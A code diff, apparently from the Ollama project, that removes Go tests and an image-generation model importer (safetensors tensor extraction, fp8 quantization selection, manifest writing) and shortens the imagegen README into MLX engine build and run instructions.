-		setup    func(dir string) error
-		expected bool
-	}{
-		{
-			name: "valid diffusers model with model_index.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(`{"_class_name": "FluxPipeline"}`), 0o644)
-			},
-			expected: true,
-		},
-		{
-			name: "empty directory",
-			setup: func(dir string) error {
-				return nil
-			},
-			expected: false,
-		},
-		{
-			name: "directory with other files but no model_index.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
-			},
-			expected: false,
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			dir := t.TempDir()
-			if err := tt.setup(dir); err != nil {
-				t.Fatalf("setup failed: %v", err)
-			}
-
-			got := IsTensorModelDir(dir)
-			if got != tt.expected {
-				t.Errorf("IsTensorModelDir() = %v, want %v", got, tt.expected)
-			}
-		})
-	}
-}
-
-func TestIsSafetensorsModelDir(t *testing.T) {
-	tests := []struct {
-		name     string
-		setup    func(dir string) error
-		expected bool
-	}{
-		{
-			name: "valid safetensors model with config.json and .safetensors file",
-			setup: func(dir string) error {
-				if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{"model_type": "gemma3"}`), 0o644); err != nil {
-					return err
-				}
-				return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: true,
-		},
-		{
-			name: "config.json only, no safetensors files",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
-			},
-			expected: false,
-		},
-		{
-			name: "safetensors file only, no config.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: false,
-		},
-		{
-			name: "empty directory",
-			setup: func(dir string) error {
-				return nil
-			},
-			expected: false,
-		},
-		{
-			name: "multiple safetensors files with config.json",
-			setup: func(dir string) error {
-				if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
-					return err
-				}
-				if err := os.WriteFile(filepath.Join(dir, "model-00001-of-00002.safetensors"), []byte("dummy"), 0o644); err != nil {
-					return err
-				}
-				return os.WriteFile(filepath.Join(dir, "model-00002-of-00002.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: true,
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			dir := t.TempDir()
-			if err := tt.setup(dir); err != nil {
-				t.Fatalf("setup failed: %v", err)
-			}
-
-			got := IsSafetensorsModelDir(dir)
-			if got != tt.expected {
-				t.Errorf("IsSafetensorsModelDir() = %v, want %v", got, tt.expected)
-			}
-		})
-	}
-}
-
-func TestIsSafetensorsModelDir_NonexistentDir(t *testing.T) {
-	got := IsSafetensorsModelDir("/nonexistent/path/that/does/not/exist")
-	if got != false {
-		t.Errorf("IsSafetensorsModelDir() = %v for nonexistent dir, want false", got)
-	}
-}
-
-// createMinimalSafetensors creates a minimal valid safetensors file with one tensor
-func createMinimalSafetensors(t *testing.T, path string) {
-	t.Helper()
-
-	// Create a minimal safetensors file with a single float32 tensor
-	header := map[string]interface{}{
-		"test_tensor": map[string]interface{}{
-			"dtype":        "F32",
-			"shape":        []int{2, 2},
-			"data_offsets": []int{0, 16}, // 4 float32 values = 16 bytes
-		},
-	}
-	headerJSON, err := json.Marshal(header)
-	if err != nil {
-		t.Fatalf("failed to marshal header: %v", err)
-	}
-
-	// Pad header to 8-byte alignment
-	padding := (8 - len(headerJSON)%8) % 8
-	headerJSON = append(headerJSON, bytes.Repeat([]byte(" "), padding)...)
-
-	// Write file
-	f, err := os.Create(path)
-	if err != nil {
-		t.Fatalf("failed to create file: %v", err)
-	}
-	defer f.Close()
-
-	// Write header size (8 bytes, little endian)
-	if err := binary.Write(f, binary.LittleEndian, uint64(len(headerJSON))); err != nil {
-		t.Fatalf("failed to write header size: %v", err)
-	}
-
-	// Write header
-	if _, err := f.Write(headerJSON); err != nil {
-		t.Fatalf("failed to write header: %v", err)
-	}
-
-	// Write tensor data (16 bytes of zeros for 4 float32 values)
-	if _, err := f.Write(make([]byte, 16)); err != nil {
-		t.Fatalf("failed to write tensor data: %v", err)
-	}
-}
-
-func TestCreateSafetensorsModel(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	// Track what was created
-	var createdLayers []LayerInfo
-	var manifestWritten bool
-	var manifestModelName string
-	var manifestConfigLayer LayerInfo
-	var manifestLayers []LayerInfo
-	var statusMessages []string
-
-	// Mock callbacks
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		data, err := io.ReadAll(r)
-		if err != nil {
-			return LayerInfo{}, err
-		}
-		layer := LayerInfo{
-			Digest:    "sha256:test",
-			Size:      int64(len(data)),
-			MediaType: mediaType,
-			Name:      name,
-		}
-		createdLayers = append(createdLayers, layer)
-		return layer, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		data, err := io.ReadAll(r)
-		if err != nil {
-			return nil, err
-		}
-		layer := LayerInfo{
-			Digest:    "sha256:tensor_" + name,
-			Size:      int64(len(data)),
-			MediaType: "application/vnd.ollama.image.tensor",
-			Name:      name,
-		}
-		createdLayers = append(createdLayers, layer)
-		return []LayerInfo{layer}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		manifestWritten = true
-		manifestModelName = modelName
-		manifestConfigLayer = config
-		manifestLayers = layers
-		return nil
-	}
-
-	progressFn := func(status string) {
-		statusMessages = append(statusMessages, status)
-	}
-
-	// Run CreateSafetensorsModel
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify manifest was written
-	if !manifestWritten {
-		t.Error("manifest was not written")
-	}
-
-	if manifestModelName != "test-model" {
-		t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-model")
-	}
-
-	// Verify config layer was set
-	if manifestConfigLayer.Name != "config.json" {
-		t.Errorf("config layer name = %q, want %q", manifestConfigLayer.Name, "config.json")
-	}
-
-	// Verify we have at least one tensor and one config layer
-	hasTensor := false
-	hasConfig := false
-	for _, layer := range manifestLayers {
-		if layer.Name == "test_tensor" {
-			hasTensor = true
-		}
-		if layer.Name == "config.json" {
-			hasConfig = true
-		}
-	}
-
-	if !hasTensor {
-		t.Error("no tensor layer found in manifest")
-	}
-	if !hasConfig {
-		t.Error("no config layer found in manifest")
-	}
-
-	// Verify status messages were sent
-	if len(statusMessages) == 0 {
-		t.Error("no status messages received")
-	}
-}
-
-func TestCreateSafetensorsModel_NoConfigJson(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create only a safetensors file, no config.json
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	// Mock callbacks (minimal)
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for missing config.json, got nil")
-	}
-}
-
-func TestCreateSafetensorsModel_EmptyDir(t *testing.T) {
-	dir := t.TempDir()
-
-	// Mock callbacks
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		return LayerInfo{}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		return []LayerInfo{{}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for empty directory, got nil")
-	}
-}
-
-func TestCreateSafetensorsModel_SkipsIndexJson(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create model.safetensors.index.json (should be skipped)
-	indexJSON := `{"metadata": {"total_size": 100}, "weight_map": {}}`
-	if err := os.WriteFile(filepath.Join(dir, "model.safetensors.index.json"), []byte(indexJSON), 0o644); err != nil {
-		t.Fatalf("failed to write index.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	var configNames []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		configNames = append(configNames, name)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify model.safetensors.index.json was not included
-	for _, name := range configNames {
-		if name == "model.safetensors.index.json" {
-			t.Error("model.safetensors.index.json should have been skipped")
-		}
-	}
-}
-
-func TestResolveManifestPath(t *testing.T) {
-	tests := []struct {
-		name      string
-		modelName string
-		wantParts []string // Parts that should appear in the path
-	}{
-		{
-			name:      "simple model name",
-			modelName: "llama2",
-			wantParts: []string{"registry.ollama.ai", "library", "llama2", "latest"},
-		},
-		{
-			name:      "model name with tag",
-			modelName: "llama2:7b",
-			wantParts: []string{"registry.ollama.ai", "library", "llama2", "7b"},
-		},
-		{
-			name:      "model name with namespace",
-			modelName: "myuser/mymodel",
-			wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "latest"},
-		},
-		{
-			name:      "model name with namespace and tag",
-			modelName: "myuser/mymodel:v1",
-			wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "v1"},
-		},
-		{
-			name:      "fully qualified model name",
-			modelName: "registry.example.com/namespace/model:tag",
-			wantParts: []string{"registry.example.com", "namespace", "model", "tag"},
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := resolveManifestPath(tt.modelName)
-
-			for _, part := range tt.wantParts {
-				if !strings.Contains(got, part) {
-					t.Errorf("resolveManifestPath(%q) = %q, missing part %q", tt.modelName, got, part)
-				}
-			}
-		})
-	}
-}
-
-func TestLayerInfo(t *testing.T) {
-	layer := LayerInfo{
-		Digest:    "sha256:abc123",
-		Size:      1024,
-		MediaType: "application/vnd.ollama.image.tensor",
-		Name:      "model.weight",
-	}
-
-	if layer.Digest != "sha256:abc123" {
-		t.Errorf("Digest = %q, want %q", layer.Digest, "sha256:abc123")
-	}
-	if layer.Size != 1024 {
-		t.Errorf("Size = %d, want %d", layer.Size, 1024)
-	}
-	if layer.MediaType != "application/vnd.ollama.image.tensor" {
-		t.Errorf("MediaType = %q, want %q", layer.MediaType, "application/vnd.ollama.image.tensor")
-	}
-	if layer.Name != "model.weight" {
-		t.Errorf("Name = %q, want %q", layer.Name, "model.weight")
-	}
-}
-
-func TestModelConfig(t *testing.T) {
-	config := ModelConfig{
-		ModelFormat:  "safetensors",
-		Capabilities: []string{"completion", "chat"},
-	}
-
-	if config.ModelFormat != "safetensors" {
-		t.Errorf("ModelFormat = %q, want %q", config.ModelFormat, "safetensors")
-	}
-	if len(config.Capabilities) != 2 {
-		t.Errorf("Capabilities length = %d, want %d", len(config.Capabilities), 2)
-	}
-}
-
-func TestManifest(t *testing.T) {
-	manifest := Manifest{
-		SchemaVersion: 2,
-		MediaType:     "application/vnd.oci.image.manifest.v1+json",
-		Config: ManifestLayer{
-			MediaType: "application/vnd.docker.container.image.v1+json",
-			Digest:    "sha256:config",
-			Size:      100,
-		},
-		Layers: []ManifestLayer{
-			{
-				MediaType: "application/vnd.ollama.image.tensor",
-				Digest:    "sha256:layer1",
-				Size:      1000,
-				Name:      "weight.bin",
-			},
-		},
-	}
-
-	if manifest.SchemaVersion != 2 {
-		t.Errorf("SchemaVersion = %d, want %d", manifest.SchemaVersion, 2)
-	}
-	if manifest.Config.Digest != "sha256:config" {
-		t.Errorf("Config.Digest = %q, want %q", manifest.Config.Digest, "sha256:config")
-	}
-	if len(manifest.Layers) != 1 {
-		t.Errorf("Layers length = %d, want %d", len(manifest.Layers), 1)
-	}
-	if manifest.Layers[0].Name != "weight.bin" {
-		t.Errorf("Layers[0].Name = %q, want %q", manifest.Layers[0].Name, "weight.bin")
-	}
-}
-
-func TestShouldQuantize(t *testing.T) {
-	tests := []struct {
-		name      string
-		tensor    string
-		component string
-		want      bool
-	}{
-		// VAE component should never be quantized
-		{"vae weight", "decoder.weight", "vae", false},
-		{"vae bias", "decoder.bias", "vae", false},
-
-		// Embeddings should not be quantized
-		{"embedding weight", "embed_tokens.weight", "", false},
-		{"embedding in name", "token_embedding.weight", "", false},
-
-		// Norms should not be quantized
-		{"layer norm", "layer_norm.weight", "", false},
-		{"rms norm", "rms_norm.weight", "", false},
-		{"ln prefix", "ln_1.weight", "", false},
-		{"layernorm in name", "input_layernorm.weight", "", false},
-
-		// Biases should not be quantized
-		{"bias tensor", "attention.bias", "", false},
-		{"proj bias", "o_proj.bias", "", false},
-
-		// Linear weights should be quantized
-		{"linear weight", "q_proj.weight", "", true},
-		{"attention weight", "self_attn.weight", "", true},
-		{"mlp weight", "mlp.gate_proj.weight", "", true},
-
-		// Transformer component weights should be quantized
-		{"transformer weight", "layers.0.weight", "transformer", true},
-		{"text_encoder weight", "encoder.weight", "text_encoder", true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := ShouldQuantize(tt.tensor, tt.component)
-			if got != tt.want {
-				t.Errorf("ShouldQuantize(%q, %q) = %v, want %v", tt.tensor, tt.component, got, tt.want)
-			}
-		})
-	}
-}
-
-func TestShouldQuantizeTensor(t *testing.T) {
-	tests := []struct {
-		name   string
-		tensor string
-		shape  []int32
-		want   bool
-	}{
-		// 2D tensors with sufficient size should be quantized
-		{"large 2D weight", "q_proj.weight", []int32{4096, 4096}, true},
-		{"medium 2D weight", "small_proj.weight", []int32{128, 128}, true},
-
-		// Small tensors should not be quantized (< 1024 elements)
-		{"tiny 2D weight", "tiny.weight", []int32{16, 16}, false},
-		{"small 2D weight", "small.weight", []int32{31, 31}, false},
-
-		// 1D tensors should not be quantized
-		{"1D tensor", "layer_norm.weight", []int32{4096}, false},
-
-		// 3D+ tensors should not be quantized
-		{"3D tensor", "conv.weight", []int32{64, 64, 3}, false},
-		{"4D tensor", "conv2d.weight", []int32{64, 64, 3, 3}, false},
-
-		// Embeddings should not be quantized regardless of shape
-		{"embedding 2D", "embed_tokens.weight", []int32{32000, 4096}, false},
-
-		// Norms should not be quantized regardless of shape
-		{"norm 2D", "layer_norm.weight", []int32{4096, 1}, false},
-
-		// Biases should not be quantized
-		{"bias 2D", "proj.bias", []int32{4096, 1}, false},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := ShouldQuantizeTensor(tt.tensor, tt.shape)
-			if got != tt.want {
-				t.Errorf("ShouldQuantizeTensor(%q, %v) = %v, want %v", tt.tensor, tt.shape, got, tt.want)
-			}
-		})
-	}
-}
-
-func TestCreateSafetensorsModel_WithQuantize(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	var quantizeRequested []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		quantizeRequested = append(quantizeRequested, quantize)
-		return []LayerInfo{{Name: name}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-
-	progressFn := func(status string) {}
-
-	// Run with quantize enabled
-	err := CreateSafetensorsModel("test-model", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify quantize was passed to callback (will be false for small test tensor)
-	if len(quantizeRequested) == 0 {
-		t.Error("no tensors processed")
-	}
-}
-
-// createMinimalImageGenModel creates a minimal diffusers-style model directory
-func createMinimalImageGenModel(t *testing.T, dir string) {
-	t.Helper()
-
-	// Create model_index.json
-	modelIndex := `{"_class_name": "FluxPipeline", "_diffusers_version": "0.30.0"}`
-	if err := os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(modelIndex), 0o644); err != nil {
-		t.Fatalf("failed to write model_index.json: %v", err)
-	}
-
-	// Create transformer directory with a safetensors file
-	transformerDir := filepath.Join(dir, "transformer")
-	if err := os.MkdirAll(transformerDir, 0o755); err != nil {
-		t.Fatalf("failed to create transformer dir: %v", err)
-	}
-	createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
-
-	// Create transformer config
-	transformerConfig := `{"hidden_size": 3072}`
-	if err := os.WriteFile(filepath.Join(transformerDir, "config.json"), []byte(transformerConfig), 0o644); err != nil {
-		t.Fatalf("failed to write transformer config: %v", err)
-	}
-}
-
-func TestCreateImageGenModel(t *testing.T) {
-	dir := t.TempDir()
-	createMinimalImageGenModel(t, dir)
-
-	var manifestWritten bool
-	var manifestModelName string
-	var statusMessages []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name, Digest: "sha256:tensor"}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		manifestWritten = true
-		manifestModelName = modelName
-		return nil
-	}
-
-	progressFn := func(status string) {
-		statusMessages = append(statusMessages, status)
-	}
-
-	err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateImageGenModel failed: %v", err)
-	}
-
-	if !manifestWritten {
-		t.Error("manifest was not written")
-	}
-
-	if manifestModelName != "test-imagegen" {
-		t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-imagegen")
-	}
-
-	if len(statusMessages) == 0 {
-		t.Error("no status messages received")
-	}
-}
-
-func TestCreateImageGenModel_NoModelIndex(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create only transformer without model_index.json
-	transformerDir := filepath.Join(dir, "transformer")
-	if err := os.MkdirAll(transformerDir, 0o755); err != nil {
-		t.Fatalf("failed to create transformer dir: %v", err)
-	}
-	createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for missing model_index.json, got nil")
-	}
-}
-
-func TestCreateImageGenModel_WithQuantize(t *testing.T) {
-	dir := t.TempDir()
-	createMinimalImageGenModel(t, dir)
-
-	var quantizeRequested []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		quantizeRequested = append(quantizeRequested, quantize)
-		return []LayerInfo{{Name: name}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-
-	progressFn := func(status string) {}
-
-	err := CreateImageGenModel("test-imagegen", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateImageGenModel failed: %v", err)
-	}
-
-	if len(quantizeRequested) == 0 {
-		t.Error("no tensors processed")
-	}
-}
--- a/x/create/imagegen.go
+++ b/x/create/imagegen.go
@@ -1,222 +0,0 @@
-package create
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"strings"
-
-	"github.com/ollama/ollama/x/imagegen/safetensors"
-)
-
-// CreateImageGenModel imports an image generation model from a directory.
-// Stores each tensor as a separate blob for fine-grained deduplication.
-// If quantize is specified, linear weights in transformer/text_encoder are quantized.
-// Supported quantization types: fp8 (or empty for no quantization).
-// Layer creation and manifest writing are done via callbacks to avoid import cycles.
-func CreateImageGenModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
-	// Validate quantization type
-	switch quantize {
-	case "", "fp4", "fp8":
-		// valid
-	default:
-		return fmt.Errorf("unsupported quantization type %q: supported types are fp4, fp8", quantize)
-	}
-
-	var layers []LayerInfo
-	var configLayer LayerInfo
-	var totalParams int64 // Count parameters from original tensor shapes
-	var torchDtype string // Read from component config for quantization display
-
-	// Components to process - extract individual tensors from each
-	components := []string{"text_encoder", "transformer", "vae"}
-
-	for _, component := range components {
-		componentDir := filepath.Join(modelDir, component)
-		if _, err := os.Stat(componentDir); os.IsNotExist(err) {
-			continue
-		}
-
-		// Find all safetensors files in this component
-		entries, err := os.ReadDir(componentDir)
-		if err != nil {
-			return fmt.Errorf("failed to read %s: %w", component, err)
-		}
-
-		for _, entry := range entries {
-			if !strings.HasSuffix(entry.Name(), ".safetensors") {
-				continue
-			}
-
-			stPath := filepath.Join(componentDir, entry.Name())
-
-			// Extract individual tensors from safetensors file
-			extractor, err := safetensors.OpenForExtraction(stPath)
-			if err != nil {
-				return fmt.Errorf("failed to open %s: %w", stPath, err)
-			}
-
-			tensorNames := extractor.ListTensors()
-			quantizeMsg := ""
-			if quantize != "" && component != "vae" {
-				quantizeMsg = ", quantizing to " + quantize
-			}
-			fn(fmt.Sprintf("importing %s/%s (%d tensors%s)", component, entry.Name(), len(tensorNames), quantizeMsg))
-
-			for _, tensorName := range tensorNames {
-				td, err := extractor.GetTensor(tensorName)
-				if err != nil {
-					extractor.Close()
-					return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
-				}
-
-				// Count parameters from original tensor shape
-				if len(td.Shape) > 0 {
-					numElements := int64(1)
-					for _, dim := range td.Shape {
-						numElements *= int64(dim)
-					}
-					totalParams += numElements
-				}
-
-				// Store as minimal safetensors format (88 bytes header overhead)
-				// This enables native mmap loading via mlx_load_safetensors
-				// Use path-style name: "component/tensor_name"
-				fullName := component + "/" + tensorName
-
-				// Determine quantization type for this tensor (empty string if not quantizing)
-				quantizeType := ""
-				if quantize != "" && ShouldQuantize(tensorName, component) && canQuantizeShape(td.Shape) {
-					quantizeType = quantize
-				}
-
-				// createTensorLayer returns multiple layers if quantizing (weight + scales)
-				newLayers, err := createTensorLayer(td.SafetensorsReader(), fullName, td.Dtype, td.Shape, quantizeType)
-				if err != nil {
-					extractor.Close()
-					return fmt.Errorf("failed to create layer for %s: %w", fullName, err)
-				}
-				layers = append(layers, newLayers...)
-			}
-
-			extractor.Close()
-		}
-	}
-
-	// Read torch_dtype from text_encoder config for quantization display
-	if torchDtype == "" {
-		textEncoderConfig := filepath.Join(modelDir, "text_encoder/config.json")
-		if data, err := os.ReadFile(textEncoderConfig); err == nil {
-			var cfg struct {
-				TorchDtype string `json:"torch_dtype"`
-			}
-			if json.Unmarshal(data, &cfg) == nil && cfg.TorchDtype != "" {
-				torchDtype = cfg.TorchDtype
-			}
-		}
-	}
-
-	// Import config files
-	configFiles := []string{
-		"model_index.json",
-		"text_encoder/config.json",
-		"text_encoder/generation_config.json",
-		"transformer/config.json",
-		"vae/config.json",
-		"scheduler/scheduler_config.json",
-		"tokenizer/tokenizer.json",
-		"tokenizer/tokenizer_config.json",
-		"tokenizer/vocab.json",
-	}
-
-	for _, cfgPath := range configFiles {
-		fullPath := filepath.Join(modelDir, cfgPath)
-		if _, err := os.Stat(fullPath); os.IsNotExist(err) {
-			continue
-		}
-
-		fn(fmt.Sprintf("importing config %s", cfgPath))
-
-		var r io.Reader
-
-		// For model_index.json, normalize to Ollama format and add metadata
-		if cfgPath == "model_index.json" {
-			data, err := os.ReadFile(fullPath)
-			if err != nil {
-				return fmt.Errorf("failed to read %s: %w", cfgPath, err)
-			}
-
-			var cfg map[string]any
-			if err := json.Unmarshal(data, &cfg); err != nil {
-				return fmt.Errorf("failed to parse %s: %w", cfgPath, err)
-			}
-
-			// Rename _class_name to architecture, remove diffusers-specific fields
-			if className, ok := cfg["_class_name"]; ok {
-				cfg["architecture"] = className
-				delete(cfg, "_class_name")
-			}
-			delete(cfg, "_diffusers_version")
-
-			// Add parameter count (counted from tensor shapes during import)
-			cfg["parameter_count"] = totalParams
-
-			// Add quantization info - use quantize type if set, otherwise torch_dtype
-			if quantize != "" {
-				cfg["quantization"] = strings.ToUpper(quantize)
-			} else {
-				cfg["quantization"] = torchDtype
-			}
-
-			data, err = json.MarshalIndent(cfg, "", "    ")
-			if err != nil {
-				return fmt.Errorf("failed to marshal %s: %w", cfgPath, err)
-			}
-			r = bytes.NewReader(data)
-		} else {
-			f, err := os.Open(fullPath)
-			if err != nil {
-				return fmt.Errorf("failed to open %s: %w", cfgPath, err)
-			}
-			defer f.Close()
-			r = f
-		}
-
-		layer, err := createLayer(r, "application/vnd.ollama.image.json", cfgPath)
-		if err != nil {
-			return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
-		}
-
-		// Use model_index.json as the config layer
-		if cfgPath == "model_index.json" {
-			configLayer = layer
-		}
-
-		layers = append(layers, layer)
-	}
-
-	if configLayer.Digest == "" {
-		return fmt.Errorf("model_index.json not found in %s", modelDir)
-	}
-
-	fn(fmt.Sprintf("writing manifest for %s", modelName))
-
-	if err := writeManifest(modelName, configLayer, layers); err != nil {
-		return fmt.Errorf("failed to write manifest: %w", err)
-	}
-
-	fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
-	return nil
-}
-
-// canQuantizeShape returns true if a tensor shape is compatible with MLX quantization.
-// MLX requires the last dimension to be divisible by the group size (32).
-func canQuantizeShape(shape []int32) bool {
-	if len(shape) < 2 {
-		return false
-	}
-	return shape[len(shape)-1]%32 == 0
-}
--- a/x/imagegen/README.md
+++ b/x/imagegen/README.md
@@ -1,250 +1,61 @@
-# Image Generation in Ollama (Experimental)
+# imagegen

-Generate images from text prompts using local AI models.
+This is a package that uses MLX to run image generation models, ahead of being integrated into Ollama's primary runner.
+in `CMakeLists.txt` and rebuild.

-## Quick Start
+### 1. Download a Model
+
+Download Llama 3.1 8B (or any compatible model) in safetensors format:

 ```bash
-# Run with a prompt
-ollama run z-image "a sunset over mountains"
-Generating: step 30/30
-Image saved to: /tmp/ollama-image-1704067200.png
+mkdir -p ./weights
+
+# Example using huggingface-cli
+hf download meta-llama/Llama-3.1-8B --local-dir ./weights/Llama-3.1-8B
+hf download openai/gpt-oss-20b --local-dir ./weights/gpt-oss-20b
 ```

-On macOS, the generated image will automatically open in Preview.
-
-## Supported Models
-
-| Model | VRAM Required | Notes |
-|-------|---------------|-------|
-| z-image | ~12GB | Based on Flux architecture |
-
-## CLI Usage
+### 2. Run Inference

 ```bash
-# Generate an image
-ollama run z-image "a cat playing piano"
+# Build
+go build ./cmd/engine

-# Check if model is running
-ollama ps
+# Text generation
+./engine -model ./weights/Llama-3.1-8B -prompt "Hello, world!" -max-tokens 250

-# Stop the model
-ollama stop z-image
+# Qwen-Image 2512 (text-to-image)
+./engine -qwen-image -model ./weights/Qwen-Image-2512 -prompt "A mountain landscape at sunset" \
+  -width 1024 -height 1024 -steps 20 -seed 42 -output landscape.png
+
+# Qwen-Image Edit (experimental) - 8 steps for speed, but model recommends 50
+./engine -qwen-image-edit -model ./weights/Qwen-Image-Edit-2511 \
+  -input-image input.png -prompt "Make it winter" -negative-prompt " " -cfg-scale 4.0 \
+  -steps 8 -seed 42 -output edited.png
 ```

-## API
